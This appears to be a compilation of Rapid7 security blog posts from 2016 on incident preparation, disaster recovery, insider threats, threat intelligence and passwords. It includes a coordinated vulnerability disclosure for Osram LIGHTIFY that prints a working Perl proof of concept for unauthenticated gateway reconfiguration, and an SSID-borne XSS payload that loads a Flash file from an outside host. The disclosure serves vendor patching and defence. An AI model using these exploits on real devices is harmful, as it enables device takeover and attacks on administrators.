
Information Security


In case you haven't yet met someone from Rapid7, you should know that we care about improving security at all companies. We have no interest in selling you products that are going to sit on your shelf, so I recently wore makeup for the first time and sat down for a live videocast with Sara Peters from Dark Reading and John Pironti from IP Architects to talk through how organizations can get their people, process, and technology working together to prioritize and respond to security threats in real time.

 

So what did we discuss? Somehow, I didn't black out like Frank the Tank in the all-important debate to save the frat, so I remember three major themes we hadn't really planned prior to the cameras starting to roll: preparation, being realistic, and data vs. intelligence.

 

What do I mean by this? Well, I hate watching myself on video, so I'll paraphrase from memory:

 

Preparation

No security team, no matter the skill level, can be dropped into a new organization and start responding to threats in real time. There needs to be a great deal of attention to the basics of security hygiene, getting buy-in from leadership on the approach, and operating according to plan. No technology is going to solve this for us; the team of IT, InfoSec, and Risk stakeholders needs to develop playbooks as a group, test themselves as a group, and develop the level of trust in each other necessary to take action right as problems arise. The "test themselves as a group" part is rarely done, but might be the most valuable piece for improving overall effectiveness.

 

Being realistic

Multiple times in our discussion, we brought up scenarios that are unrealistic for most businesses. Should you be worried about nation state attacks? Do you need to protect against Stuxnet? Do you need to rush to protect yourself against the latest zero-day with a logo and catchy name? The answer to all three of these questions is: most likely not. Your focus should first be on defending the assets at the core of your business against the opportunistic attacks that use well-known exploits. Additionally, if you aren't involved in helping the organization adopt the latest technology that makes it productive, that technology is going to be used anyway - just not in a secure fashion.

 

Data vs. intelligence

This topic of data needing context to become information, and needing to be relevant to you to actually constitute intelligence, has been a common discussion topic at Rapid7 lately. We all agreed that threat intelligence is not just a list of IP addresses from an unknown source - and an organization's logs and other machine data are no different: they need context and relevance too. Your goal should be to get the right information to your team, not simply to collect all of the data.

 

To watch the full video on-demand, even if only to get blackmail screen grabs of me in makeup, check it out here:

Prioritizing And Responding To Security Threats In Real Time - Webcast - 2016-08-16 13:00:00 EDT

 

If you want to learn more about the various ways Rapid7 can help your business, our Advisory Services are often a good place to start.

...and then it might be too late.

 

 

Recently, Delta Airlines suffered a weeklong outage that, taken at face value, ticks just about every box in a security person's disaster recovery planning scenario.

 

Delta has given multiple interviews on what happened. Although details are still being pieced together, essentially the company had a power issue, and when it tried to go to backup systems, they failed. I managed a data center for several years, and this is what keeps data center managers up at night: the what-if-it-doesn't-come-back-up scenario.

 

The outage cost Delta millions of dollars in recovery effort, including vouchers given to customers who were inconvenienced. It also severely impacted travelers through hundreds of cancelled flights, and Delta likely suffered some reputational damage.

 

Hindsight being 20/20, this scenario - with good risk management - can be avoided, or at the very least its impact can be reduced, but it takes awareness, resources, and buy-in from top management. Ed Bastian, the CEO of Delta, has taken personal responsibility for the failure. We can expect significant internal review of the disaster preparedness scenarios Delta's IT teams are involved in.

 

Business continuity and disaster recovery are also a security professional's concern, as they impact the CIA triad's most demanding principle: Availability. Availability means that information is available to users when they need it, and it can take many different forms depending on the business context. Delta, as a company which operates 24x7x365, relies on availability, and any impact to it also impacts the timing of fleet operations. Even minor disruptions cause cascades which severely and adversely affect the business. Sensitivity to availability is one reason it took so long for Delta to fully recover; the longer systems stayed down, the more the problem was amplified.

 

"The system moved to backup power but not all the servers were connected to it," Bastian told the WSJ.

 

Documentation is key to all disaster planning. You have to understand in your disaster recovery (DR) plan what will and will not be part of your backup system. It is very expensive to maintain a full replica of your systems, so your DR plan might account for only a partial recovery. The business risk of a partial recovery must be documented and communicated so everyone understands what will happen in a disaster scenario. Bastian commented, "We did not believe, by any means, that we had this kind of vulnerability."

 

Use this incident, and the four-day Southwest Airlines outage from a few weeks earlier, to review your business continuity/disaster recovery plans - and especially to create them if you don't have any in place. Test your recovery plans at regular intervals, using tabletop walkthroughs and actual recovery exercises, and make upper management aware of the outcomes. Use these results to drive improvements in planning for availability, and you can avoid or reduce the impact of a disaster scenario. And always remember to revisit and update your plan at regular intervals, especially at the conclusion of a test, to ensure you have up-to-date and relevant information.

 

At a minimum, your disaster plan should include:

 

  • Paper copies of everything relevant to the disaster plan; online resources will likely be disrupted, even if you have highly available systems or cloud-based ones
  • Contact information of all relevant stakeholders in a disaster; C-levels, technicians, business people, customers; anyone who would need to be part of the recovery scenarios; include physical addresses of sites and phone numbers of required resources
  • A list of required vendors your organization needs to operate in the event of a disaster scenario; include contact information for those vendors
  • A map of all systems which would function on backup power; include all the networking devices between the systems (switches, routers, storage); map the systems to business functions so you can see visually which functions would be disrupted and which would be operational
  • Maps of physical locations that are relevant to disaster recovery
  • Forms which are critical to business operations such as supply order forms, injury reports, expense tracking, etc
  • Disaster declaration procedures, and communication procedures (who to contact when, who is in charge of media relations, etc)
  • Checklists and runbooks for operations processes - these ensure that the distractions of a disaster do not derail running operations, and that recovery steps do not depend on memory or specialized skill to accomplish

 

This is just a short list, and does not go into the specifics of disaster planning, but it's a good start and validation point. Once you have checked off this list, start to look at recovery time objectives (RTO), recovery point objectives (RPO), and true business continuity processes (processes which allow the business to continue uninterrupted, even during an outage). For example, an RPO of one hour means backups must capture changes at least hourly, while an RTO of four hours means systems must be restored within four hours of declaring a disaster. There is a host of online resources and third-party providers available to help.

 

According to the WSJ article, “It’s not clear the priorities in our investment have been in the right place,” Mr. Bastian said. “It has caused us to ask a lot of questions which candidly we don’t have a lot of answers for.” Upper management can be reluctant to put money into disaster recovery, seeing it more as an insurance policy, which it partially is. Testing isn't just to vet your plans; it's also how priorities get positioned correctly. If testing shows that not all systems would be recoverable, then investment can be justified.

 

Disaster planning requires time and some resources to accomplish. This is an investment in the future, and any time invested now will be offset by the reduction in recovery time later, and hopefully, the lessened impact on your business operations.

Read most security vendors’ websites (yes, we know what we are) and you’ll generally find something about the terrifying “Risk of Insider Threats.” Rogue employees are lurking around every corner. You try to hire good honest people, brimming with integrity, but still these evildoers slip through the net and before you know it they are trying to take you down. They don’t care that you have a family to feed, that you put your life and soul into creating a flourishing business. Maybe you should just go self-employed. Switch off the internet and go back to pen and paper. Reduce the risk completely and become a cave-dwelling hermit. Actually, can you come back out of the cave and turn the internet back on for a moment please? Thanks.

 

I hope the mild exaggeration in the above paragraph was apparent. And if that’s the reality in your business, perhaps it’s time to rethink your hiring strategy (and maybe go back to the cave after all, it was nice in there, right?). Most of your employees really like you having a business; they don’t want to ruin it, and they aren’t going to do something purposely malicious. There is a BUT coming, though. Actually, there are two, because reality is a harsh mistress.

BUT #1... Insider threats are real.

I’m sorry, I’m being That Vendor. We haven’t invented this as an industry, I promise. It does only take one person to cause a lot of potential damage – take the recent Sage data breach as an example: hundreds of detailed financial customer records accessed by an unauthorised* employee. At the time of writing this, the Sage investigation is ongoing - an arrest has been made, and a lot of Sage's customers have received a notification that their details may have been on the list. Like I said, it just takes one.

 

*that isn't a typo btw, I’m from that tiny island over the pond, we just don't do zeds with the same level of enthusiasm that Americans do #sorrynotsorry

 

BUT #2... Unwitting insider threats are a much greater concern.

This isn’t a disgruntled employee, it’s someone who can easily open up your business to the evils of the outside world. They clicked on a dodgy Facebook link from a friend, they opened up an "invoice" which turned out to be hiding malicious code, they chomped down on the hook of a phishing email and before you can say Wicked Tuna, there’s a keylogger or worse sitting on their PC. Their user credentials get captured and delivered off to someone truly malicious outside of your organisation. Your employee didn’t mean to cause a problem, they just didn’t know any better. And they’d possibly do the same thing all over again tomorrow.

 

Understanding the risk posed by your employees, the users of your systems, the people who access critical data that’s key to your business is so much bigger than worrying about the occasional rogue employee.

 

Bonus BUT (because marketing)... Compromised user credentials behave just like insider threats

Protecting assets is an important part of any security program, no doubt about it, but a huge number of data breaches are caused by compromised user credentials (the Verizon Data Breach Investigations Report has listed this as the top attacker method for breaching a network every year since 2013). These are user accounts that look, feel and smell like the real deal because That’s Exactly What They Are. They just got into the wrong hands. And if you fall into the 60% of organisations who have no way to detect compromised credentials, you won’t be able to tell the difference between a bona fide user and an attacker using a compromised account. On the plus side, they won't be hogging the drinks table at your summer party, but that's really the smallest of wins.

 

Call to action: Don’t be a hermit!

If you’re thinking seriously about that cave option again, it’s OK, you don’t need to (unless cave dwelling is actually your thing, but let’s assume otherwise because it’s a little niche). Take stock, think about where your weak spots are. Would your employees benefit from some up-to-date security awareness training? How robust are those incident response processes?  When did you last health-check your overall security program? Do you have the capabilities to quickly spot an attacker who’s got their grubby mitts on the keys to your metaphorical castle (or cave, obvs)?

 

If the answers to those questions aren’t clear, we can help you get a plan together. You can gain the insight you need to be able to protect your business. Visit our web page on compromised credentials and learn more about how we can help you achieve this.

 

Samantha Humphries

The SANS State of Cyber Threat Intelligence Survey [PDF] has been released and highlights some important issues with cyber threat intelligence:

 

Usability is still an issue - Almost everyone is using some sort of cyber threat intelligence. Hooray! The downside – there is still confusion as to the best ways to implement and utilize threat intelligence, and the market is not making it any easier. We believe that the confusion is related to the initial push by threat intelligence vendors to sell list-based threat intelligence – lists of IPs, lists of domains, etc – with little, or even worse, no context. This type of threat feed is data, not intelligence, but it is easy to put together and it isn’t too difficult to integrate with security tools that are used to receiving blacklists or signature based threat data. That…well…to put it nicely, doesn’t exactly work. The survey shows that over 60% of respondents are using threat intelligence to block malicious domains or IP addresses, which contributes to high false positives and a nebulous idea of what threat intelligence is actually supposed to be doing. However, nearly half use threat intelligence to add context to investigations and assessments, which is a much better application of threat intelligence and even though it uses some of the same data sources, it requires the additional analysis that actually turns it into intelligence. A smaller number of respondents reported that they use threat intelligence for hunting or to provide information to management (28 and 27 percent, respectively), but it appears that these areas are growing as organizations identify the value they provide.

 

Threat Intelligence helps to make decisions - 73% of respondents said that they felt they could make better and more informed decisions by using threat intelligence. 71% said that they had improved visibility into threats by using threat intelligence. These are both key aspects of threat intelligence and indicate that more organizations are using threat intelligence to assist with decision making rather than only focusing on the technical, machine to machine aspect of threat intel.  One of the overarching goals in intelligence work in general is to provide information to decision makers about the threats facing them, and it is great to see that this application of CTI is growing. CTI can be used to support every aspect of a security program, from determining general security posture and acceptable level of risk to prioritizing patching and alerting, and threat intelligence can provide insight to support all of these critical decisions.

 

More isn’t necessarily better – the majority of respondents who engage in incident response or hunting activities indicated that they could consume only 11-100 indicators of compromise on a weekly basis, and can only conduct in-depth research and analysis on 1-10 indicators per week. Since there are approximately eleventy-billion indicators of compromise being generated and exchanged every week that puts a lot of pressure not only on analysts, but on the tools we use to automate the collection and processing of data. Related – two of the biggest pain points respondents had with implementing cyber threat intelligence are the lack of technical capabilities to integrate CTI tools into environments, and the difficulty of implementing new security systems and tools. In order to automate the handling of large amounts of indicators in a way that allows analysts to zero in on the most important and relevant ones, we need to have confidence in our collection sources, confidence in our tools, and confidence in our processes. More of the wrong type of data isn’t better, it distracts from the data that is relevant and makes it nearly impossible for a threat intelligence analyst to actually conduct the analysis needed to extract value.

 

To learn more about our approach to integrating threat intelligence into incident detection and response processes, come join us for an IDR intensive session at our annual conference, UNITED Summit.

This is a guest post from our frequent contributor Kevin Beaver. You can read all of his previous guest posts here.

 

Small and medium-sized businesses (SMBs) have it made in terms of security. No, I’m not referring to the threats, vulnerabilities, and business risks. Those are the same regardless of the size of the organization. Instead, I’m talking about how relatively easy it is to establish and build out core information security functions and operations when the business is small. Doing this in an organization with a handful of employees – maybe a dozen or two – that has a simple network and application environment (in-house and in the cloud) is unbelievably simple compared to doing it in larger organizations.

 

I’ve helped several small businesses build out their policies, security testing/assessment processes, and technologies over the years and it’s so neat to see how they’ve been able to progress from essentially firewalls and anti-virus to a full-blown IT/security governance program that rivals that of any large enterprise – all with minimal effort over time, relatively speaking. It’s the equivalent of parents establishing good habits around eating and exercising in young children that they learn from and build upon for the rest of their lives instead of doctors and dieticians having to convince a 45-year old type 2 diabetic that he has to change his entire lifestyle if he’s going to fix his heart problems and live past 50. The former is much easier (and less costly) than the latter.

 

One of the biggest challenges with SMBs is that they may not think they’re a target, they may not think they have to comply with the various security and privacy regulations, or they may not know about information security practices at all. The former two resolve themselves pretty quickly through breaches and pressure from business partners and customers, who are often large businesses with stringent security requirements. The latter is the biggest concern, in large part due to these businesses’ third-party IT consultants/service providers not fully understanding security. Many, perhaps most, small businesses start out using an outside IT services provider, and I’ve witnessed a fox-guarding-the-henhouse situation numerous times over the years whereby these outside providers implement firewalls, anti-virus software, and data backup solutions, and that’s where security begins and, unfortunately, ends.

 

Another situation that builds on this is something I see with many smaller businesses: technologies and policies are put in place but a security assessment is never performed to determine where things truly stand. It's the cart before the horse. The builder remediation before the home inspection. The chemotherapy before the CT scan. You can’t force people to look past their false sense of security but it sure is a big oversight in the SMB space that needs some quick attention.

 

So, SMB security is simple, but it can become complicated if it’s made out to be. The choice is yours – focus on security now while you’re young and reap the rewards of simplicity, or put it off so it’s more expensive and exponentially more complicated when you’re forced to address it down the road. If you own, work for, or serve as a consultant to a small or medium-sized business, make the decision to start and build out a basic information security program. Don’t wait, get started on it now and grow into it over time. It’ll scale as complexity grows with the business and will be so much easier to tweak than having to start from scratch. Something that I can say with conviction because I’ve been a part of it: you will not regret it.

First off: Hi! I’m the new community manager here at Rapid7. And like many in the security community, I’ll be heading to Vegas for Black Hat, BSidesLV and DEF CON in a little more than a week. I’m looking forward to diving right in to meeting the community and learning from some of the smartest professionals in the industry. I’ve prepped by reading last year’s Black Hat Attendee Guide and if you’re heading to Vegas, I recommend you take a look, too.

 

I’d also like to introduce you to someone else. The Rapid7 Moose.

 

At Rapid7, we refer to ourselves as "Moose" because the plural and the singular are the same word. When we refer to ourselves as moose, we are saying that while we all strive for excellence as individuals, we are stronger working together as a team with shared goals. And we firmly believe this extends to our customers and community. After all, by working together, the community is able to support and educate each other to keep fighting for better security.

 

To demonstrate this philosophy about community-based security, and the power of working together, we will be introducing the Moose at our Black Hat Booth, #532.  We’re talking about a nine-foot moose here, so we encourage you to come by and take some photos with the Moose and share them on Twitter to enter our Black Hat sweeps.

 

Here’s the scoop:

Take a picture with our moose, tag #BHUSA and @rapid7 to be entered to win an Oculus Rift. Can’t come to the booth? Just share a moose pun or joke with @rapid7 and tag #BHUSA and you’ll be entered as well! Sweeps will open on August 3 and close on August 5 (plenty of time to get those pics uploaded or jokes shared after exhibits close). See below for official terms and conditions.


 

 

Rapid7 Black Hat Twitter Sweeps

Terms & Conditions

 

The promotion is only open to residents in the United States and Canada who must be aged 18 or over.

 

No purchase is necessary to participate in the sweeps. Eligibility is dependent on following the entry rules outlined in this guide. Multiple entries will be accepted; however, no third party or bulk entries will be accepted. Entry submissions may not contain, as determined by Rapid7, any content that is obscene or offensive or violates any law.

 

To enter: On Twitter, share a post that includes either 1) a picture of the moose from Black Hat Booth #532 and the tag #BHUSA and @rapid7 or 2) a moose pun and the tag #BHUSA and @rapid7.

 

The sweeps will open on Wednesday, August 3, 2016 at 09:00:01 a.m. PT and close on Friday, August 5, 2016 at 09:59:59 p.m. PT. Entries made after these times will not be accepted.

 

One winner will be picked at random from the received eligible entries for the sweeps. The draw will take place by Tuesday, August 9 at 11:59:59 p.m. ET. The winner will be notified via the Rapid7 Twitter page and will have 48 hours to respond via direct message to claim the prize. If the prize is unclaimed after 48 hours, an alternate winner will be selected.

 

The prize for this sweeps is an Oculus Rift (estimated value $599) and will be shipped as soon as possible after the date of response from the winner. The prize is non-transferable and non-exchangeable. No cash or credit alternative is available. Should the prize become unavailable for any reason, Rapid7 reserves the right to provide a substitute prize of approximately equivalent or greater value. The winner list can be obtained after Monday, August 22, 2016 by emailing community @ rapid7 (dot) com.

 

Sweeps host is Rapid7 LLC, 100 Summer St, Boston, MA 02110.

 

By entering the sweeps, you agree to these terms and conditions. Employees and the immediate families of Rapid7 may not participate.

 

If you have any concerns or questions related to these terms and conditions, please email community @ rapid7 (dot) com.

Nine issues affecting the Home or Pro versions of Osram LIGHTIFY were discovered, with the practical exploitation effects ranging from the accidental disclosure of sensitive network configuration information, to persistent cross-site scripting (XSS) on the web management console, to operational command execution on the devices themselves without authentication. The issues are designated in the table below. At the time of this disclosure's publication, the vendor has indicated that all but the lack of SSL pinning and the issues related to ZigBee rekeying have been addressed in the latest patch set.

 

Description | Status | Platform | R7 ID | CVE
Cleartext WPA2 PSK | Fixed | Home | R7-2016-10.1 | CVE-2016-5051
Lack of SSL Pinning | Unfixed | Home | R7-2016-10.2 | CVE-2016-5052
Pre-Authentication Command Execution | Fixed | Home | R7-2016-10.3 | CVE-2016-5053
ZigBee Network Command Replay | Unfixed | Home | R7-2016-10.4 | CVE-2016-5054
Web Management Console Persistent XSS | Fixed | Pro | R7-2016-10.5 | CVE-2016-5055
Weak Default WPA2 PSKs | Fixed | Pro | R7-2016-10.6 | CVE-2016-5056
Lack of SSL Pinning | Unfixed | Pro | R7-2016-10.7 | CVE-2016-5057
ZigBee Network Command Replay | Unfixed | Pro | R7-2016-10.8 | CVE-2016-5058
Cached Screenshot Information Leak | Fixed | Pro | R7-2016-10.9 | CVE-2016-5059

 

Product Description

According to the vendor's January 2015 press release, Osram LIGHTIFY provides "a portfolio of cost-effective indoor and outdoor lighting products that can be controlled and automated via an app on your mobile device to help you save energy, enhance comfort, personalize your environment, and experience joy and fun." It is used by both residential and commercial customers, via the Home and Pro versions, respectively. As a "smart lighting" offering, Osram LIGHTIFY is part of the Internet of Things (IoT) landscape, and is compatible with other ZigBee-based automation solutions.

Credit

These issues were discovered by Deral Heiland, Research Lead at Rapid7, Inc., and this advisory was prepared in accordance with Rapid7's disclosure policy.

Exploitation and Mitigation

R7-2016-10.1: Cleartext WPA2 PSK (Home) (CVE-2016-5051)

Examination of the mobile application for LIGHTIFY Home, running on an iPad, revealed that the WiFi WPA2 pre-shared key (PSK) of the user's home WiFi is stored in cleartext in the file /private/var/mobile/Containers/Data/Application/F1D60C51-6DF5-4AAE-9DB1-40ECBDBDF692/Library/Preferences/com.osram.lightify.home.plist. Examining this file reveals the cleartext string as shown in Figure 1:

Figure 1, Cleartext WPA2 PSK

 

If the device is lost or stolen, an attacker could extract this data from the file.

Mitigation for R7-2016-10.1

A vendor-supplied patch should configure the mobile app to prevent storing potentially sensitive information, such as WiFi PSKs and passwords in cleartext. While some local storage is likely necessary for normal functionality, such information should be stored in an encrypted format that requires authentication.

 

Absent a vendor-supplied patch, users should avoid connecting the product to a network that is intended to be hidden or restricted. In cases where this is undesirable, users should ensure that the mobile device is configured for full-disk encryption (FDE) and requires at least a password on first boot.

R7-2016-10.2: Lack of SSL Pinning (Home) (CVE-2016-5052)

Examination of the mobile application reveals that SSL pinning is not in use. By not implementing SSL pinning, it is possible for an attacker to conduct a Man-in-the-Middle (MitM) attack, ultimately exposing SSL-encrypted traffic to the successful attacker for inspection and manipulation.

Mitigation for R7-2016-10.2

A vendor-supplied patch should configure the mobile application to use SSL pinning.

 

Absent a vendor-supplied patch, users should avoid using the mobile application in potentially hostile networks.

R7-2016-10.3: Pre-Authentication Command Execution (Home) (CVE-2016-5053)

Examination of the network services on the gateway shows that port 4000/TCP is used for local control when Internet services are down, and no authentication is required to pass commands to this TCP port. With this access, an unauthenticated actor can execute commands to change lighting, and also execute commands to reconfigure the devices. The following Perl script proof of concept code can be used to reconfigure a vulnerable device's primary WiFi connection, causing it to reconnect to an attacker-supplied WiFi network.

 

#!/usr/bin/perl
# POC to change SSID setting on OSRAM LIGHTIFY GATEWAY
# Deral Heiland, Rapid7, Inc.

use IO::Socket;
if ($#ARGV != 2) {
  print " You are missing needed Arguments\n";
  print "Usage: lightify_SSID_changer.pl TargetIP SSID WPA_PSK \n";
  exit(1);
}

# Input variables
my $IP = $ARGV[0];
my $SSID = $ARGV[1];
my $WPAPSK = $ARGV[2];

# Set up TCP socket
$socket = new IO::Socket::INET (
  PeerAddr => $IP,
  PeerPort => 4000,
  Proto => 'tcp',
  )
or die "Couldn't connect to Target\n";

#Set up data to send to port 4000
$data1 = "\x83\x00\x00\xe3\x03\x00\x00\x00\x01";
$data2 = pack('a33',"$SSID");
$data3 = pack('a69',"$WPAPSK");
$data4 = "\x04\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
$send_data = join "", $data1, $data2, $data3, $data4;

#send data to port 4000
$socket->send($send_data);
close $socket;
exit;

 

 

Mitigation for R7-2016-10.3

A vendor-supplied patch should implement and enforce authentication on the gateway's 4000/TCP interface.

 

Absent a vendor-supplied patch, users should not deploy the gateway in a network environment used by potentially malicious actors.

R7-2016-10.4: ZigBee Network Command Replay (Home) (CVE-2016-5054)

Examination of the ZigBee home automation communication reveals that no rekeying of the ZigBee secure communication takes place after the initial pairing of the ZigBee-enabled end nodes (the light components of the system). Due to this lack of routine rekeying, it is possible for a malicious actor to capture the ZigBee communication at any time and later replay those commands to disrupt lighting services, without any other form of authentication.

Mitigation for R7-2016-10.4

The current ZigBee Home Automation Protocol standard suffers from vulnerabilities that prevent properly securing the protocol. Resolving these inherent security flaws requires fixes to the core protocol, which is under the control of the ZigBee Alliance (http://www.zigbee.org/).

 

Absent corrections of the Zigbee Home Automation protocol, users should not deploy the lighting components in a network environment used by potentially malicious actors.

R7-2016-10.5: Web Management Console Persistent XSS (Pro) (CVE-2016-5055)

The installed web management console, which runs on ports 80/TCP and 443/TCP, is vulnerable to a persistent Cross Site Scripting (XSS) vulnerability. This vulnerability allows a malicious actor to inject persistent JavaScript and HTML code into various fields within the Pro web management interface. When this data is viewed within the web console, the injected code will execute within the context of the authenticated user. As a result, a malicious actor can inject code which could modify the system configuration, exfiltrate or alter stored data, or take control of the product in order to launch browser-based attacks against the authenticated user's workstation.

 

The first example of this flaw was found by injecting persistent XSS into the security logs via the username field during the basic authentication sequence, as shown below in Figure 2.

Figure 2: Username XSS Injection

 

Anything entered in the "User Name" field gets written to the security logs without sanitization. When these logs are reviewed, the JavaScript is rendered and executed by the victim's browser. Figure 3 demonstrates an alert box run in this way.

Figure 3: Injected JavaScript Alert Box

The second example of this flaw was found by injecting XSS into the Wireless Client Mode configuration page. This was accomplished using a rogue access point to broadcast an SSID containing the XSS payload. Using the following airbase-ng command, it is possible to broadcast the XSS payload as an SSID name.

 

airbase-ng -e '</script><embed src=//ld1.us/4.swf>' -c 9 wlan0mon

 

When the SSID of </script><embed src=//ld1.us/4.swf> is displayed on the Wireless Client Mode configuration page, the referenced Flash file is downloaded and run in the context of the authenticated user. This is shown in Figure 4.

Mitigation for R7-2016-10.5

A vendor-supplied patch should ensure that all data is filtered and that special characters such as > and < are properly escaped before being displayed by the web management console.
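
To illustrate the kind of output encoding involved, here is a generic sketch (not Osram's code; the module choice and sample values are ours) showing how untrusted input such as a logged username or a broadcast SSID could be HTML-escaped with Perl's HTML::Entities before it reaches the console page:

#!/usr/bin/perl
# Generic illustration only -- not Osram's code. Shows output encoding of
# untrusted values (a logged username, a broadcast SSID) before display.
use strict;
use warnings;
use HTML::Entities qw(encode_entities);

my $username = q{<script>alert(1)</script>};              # hypothetical attacker input
my $ssid     = q{</script><embed src=//ld1.us/4.swf>};    # SSID payload from the advisory

# Escape <, >, &, and double quotes before the values reach the page
my $safe_username = encode_entities($username, '<>&"');
my $safe_ssid     = encode_entities($ssid, '<>&"');

print "Security log entry: failed login for '$safe_username'\n";
print "Visible wireless network: $safe_ssid\n";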

 

Absent a vendor-supplied patch, users should not deploy the web management console in a network environment used by potentially malicious actors.

R7-2016-10.6: Weak Default WPA2 PSKs (Pro) (CVE-2016-5056)

Weak default WPA2 pre-shared keys (PSKs) were identified on the devices examined, which used an eight-character PSK drawn only from the characters "0123456789abcdef". This extremely small keyspace of limited characters and a fixed, short length makes it possible to crack a captured WPA2 authentication handshake in less than 6 hours, leading to remote access to the cleartext WPA2 PSK. Figure 5 shows the statistics of cracking the WPA2 PSK on one device in 5 hours and 57 minutes.

Figure 5: Hashcat Cracking WPA2 PSK in Under Six Hours

 

A second device's WPA2 PSK was cracked in just 2 hours and 42 minutes, as shown in Figure 6:

Figure 6: Hashcat Cracking WPA2 PSK in Under Three Hours
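
The keyspace math behind those cracking times is straightforward. The short Perl sketch below works it out; note that the guess rate used is an assumed round number for a single GPU of that era, not a figure measured in these tests:

#!/usr/bin/perl
# Back-of-the-envelope keyspace estimate for an 8-character, hex-only PSK.
# The guess rate is an assumption for illustration, not a measured benchmark.
use strict;
use warnings;

my $charset_size = 16;                         # "0123456789abcdef"
my $length       = 8;
my $keyspace     = $charset_size ** $length;   # 16^8 = 4,294,967,296 candidates

my $assumed_rate = 200_000;                    # WPA2 guesses per second (assumed)
my $worst_case_h = $keyspace / $assumed_rate / 3600;

printf "Keyspace: %.0f candidate PSKs\n", $keyspace;
printf "Worst case at %d guesses/sec: about %.1f hours\n", $assumed_rate, $worst_case_h;
# Roughly six hours worst case, in line with the cracking times observed above.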

Mitigation for R7-2016-10.6

A vendor-supplied patch should implement longer default PSKs drawn from a larger keyspace that includes uppercase and lowercase letters, digits, and punctuation, since these keys are not typically intended to be remembered by humans.

 

Absent a vendor-supplied patch, users should set their own PSKs following the above advice, and not rely on the defaults shipped by the vendor.

R7-2016-10.7: Lack of SSL Pinning (Pro) (CVE-2016-5057)

As in the Home version of the system, the Pro version does not implement SSL pinning in the mobile app. See R7-2016-10.2: Lack of SSL Pinning (Home) (CVE-2016-5052), above.

R7-2016-10.8: ZigBee Network Command Replay (Pro) (CVE-2016-5058)

As in the Home version of the system, the Pro version does not implement rekeying of the ZigBee commands. See R7-2016-10.4: ZigBee Network Command Replay (Home) (CVE-2016-5054), above.

R7-2016-10.9: Cached Screenshot Information Leak (Pro) (CVE-2016-5059)

Examination of the commissioning app revealed that the application caches a screenshot of the current page when the iPad home button is pressed, storing it in the folder /private/var/mobile/Containers/Data/Application/A253B0DA-CFCE-433A-B0A1-EAEB7B10B49C/Library/Caches/Snapshots/com.osram.LightifyPro/com.osram.LightifyPro.

 

This practice can often lead to confidential data being stored within the snapshot folder on the iPad. As shown in Figure 7, the cleartext password of the gateway is displayed in the cached screenshot.

 

Mitigation for R7-2016-10.9

A vendor-supplied patch should use a default page for the Downscale function when the home button is pressed, and ensure that all passwords and keys displayed on the application configuration pages are obfuscated with asterisks.

 

Absent a vendor-supplied patch, users should be mindful of when they minimize the running mobile application to avoid accidentally disclosing sensitive information.

Disclosure Timeline

  • Mon, May 16, 2016: Initial contact to the vendor by Rapid7.
  • Tue, May 17, 2016: Vendor acknowledged receipt of vulnerability details.
  • Tue, May 31, 2016: Details disclosed to CERT/CC (Report number VR-174).
  • Wed, Jun 01, 2016: CVEs assigned by CERT/CC.
  • Thu, Jul 07, 2016: Disclosure timeline updated and communicated to the vendor and CERT/CC.
  • Thu, Jul 21, 2016: Vendor provided an update on patch development.
  • Tue, Jul 26, 2016: Public disclosure of the issues.

 

Update (Aug 10, 2016): Added a note about the Zigbee protocol for R7-2016-10.4 in the summary section.

Over the last few months, Jordan Rogers and I have been speaking about the benefits of doing the basics right in information security.

 

Reducing noise, avoiding the waste of precious budget dollars on solutions that will not be used to their fullest, as well as improving the overall security of your enterprise are all goals that can be achieved with some of these simple tips.

 

We presented a hybrid Mac/Windows version of this talk at the MacAdmins conference at PSU, where it was filmed and uploaded to YouTube.

 

Take a look if you'd like to hear the perspective of an Incident Response person combined with a Blue Team person, information from real problems we observed, as well as recommendations on how to mitigate those issues!

 

From the trenches: Breaches, Stories, Simple Security Solutions - YouTube

This is a guest post from our frequent contributor Kevin Beaver. You can read all of his previous guest posts here.

 

Recently, I wrote about my thoughts on why we feel like we have to force short-term password changes in the name of “security.” Since that time, Microsoft made an announcement to step in and help set its users (and itself) up for success with more stringent password requirements for Microsoft Account and Azure Active Directory. Sad it has come to this – a vendor doing what they must do to force people to use stronger passwords. We’re devolving as computer users.

 

As shown in study after study - e.g. Ponemon, Verizon, and (especially) this insightful research from Rapid7 - the basics are ignored, we cry out for newer and better security controls, government regulations grow, and yet nothing gets better. Apparently information security basics, such as addressing weak passwords, are just too much to ask for. Take, for instance, Security, Accuracy, and Privacy in Computer Systems – a great book written by the late James Martin. It covers all sorts of security basics – what’s needed and how to balance it all out. That book was written in 1973. We still can’t get security right. Not even passwords.

 

So, what is the answer? Is it IT’s fault? IT and security teams, and the executives heading things up are certainly complicit. Some ignore password vulnerabilities. Some have trouble getting their messages across. Others are afraid to say anything, especially given the predictable pushback from management. Users are on the hook as well. As much as we try to set them up for success through technical controls and awareness/training, at some point, they need to be held accountable. They’re grown-ups and it’s not like this whole computer password thing is something new.

 

Maybe we should continue down the path of making things more complex through regulations, lawyers, and technical controls that promise to make everything better. Ha! Not unlike attempts at failed social initiatives involving emotional responses to crises rather than due process, I suspect we’ll continue down the path of more laws, more policies, more audits, and a growing false sense of security. Our current approach to passwords is not working. Maybe that’s okay – perhaps someone else can figure it out down the road.

 

Mark Matteson was quoted as saying “Good habits are hard to form and easy to live with. Bad habits are easy to form and hard to live with. Pay attention. Be aware. If we don’t consciously form good ones, we will unconsciously form bad ones.” With weak passwords – more than any other computer security vulnerability – what I believe we need is discipline. Discipline on the part of IT and security teams. Discipline on the part of users. Discipline on the part of management. That and some backbone to see things through over time (again, especially with passwords) until the challenges are resolved. Unless and until something changes in this area, I suspect we’ll continue down this path of ignorant bliss and continued breaches.

Due to a lack of encryption in communication with the associated web services, the Seeking Alpha mobile application for Android and iPhone leaks personally identifiable and confidential information, including the username and password to the associated account, lists of user-selected stock ticker symbols and associated positions, and HTTP cookies.

Credit

Discovered by Derek Abdine (@dabdine) of Rapid7, Inc., and disclosed in accordance with Rapid7’s disclosure policy.

Product Description

Seeking Alpha provides individuals with the ability to track and quantify their stock portfolio holdings. The vendor’s website states “Seeking Alpha is a platform for investment research, with broad coverage of stocks, asset classes, ETFs and investment strategy. In contrast to other equity research platforms, insight is provided by investors and industry experts rather than sell-side analysts.”

Exploitation

An attacker in a privileged position on the target's network can intercept, view, and modify communications between the Seeking Alpha mobile application and its associated web services trivially, due to the reliance on HTTP cleartext communications, rather than HTTPS. HTTP is used for routine polling for stock ticker symbols the user has configured, which may reveal overly personal financial information about the user that could be used in a targeted attack.

 

